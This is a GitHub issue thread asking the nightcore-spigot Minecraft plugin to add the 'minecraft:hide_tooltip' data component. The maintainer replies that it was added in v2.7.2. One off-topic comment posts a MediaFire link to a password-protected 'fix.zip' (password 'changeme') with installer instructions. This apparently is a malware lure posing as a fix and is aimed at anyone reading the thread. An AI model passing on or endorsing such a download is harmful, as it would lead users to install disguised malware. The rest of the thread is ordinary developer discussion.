### ISSUE TITLE
Add new data component `minecraft:hide_tooltip` 

### ISSUE THREAD

**Issue by ravel10** [nulli0n/nightcore-spigot#19]
Add the new data component `minecraft:hide_tooltip` to completely hide the tooltip of a item (and the name) for glass pane on ExcellentCrates preview

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SirC4LV1N** [comment]
There are even more data components, like stacksize, maxdurability, foodcomponent. and the HideToolTip only works if a tooltip is set (not the default ones (if im not mistaken))

**Comment by nulli0n** [comment]
Added in v2.7.2
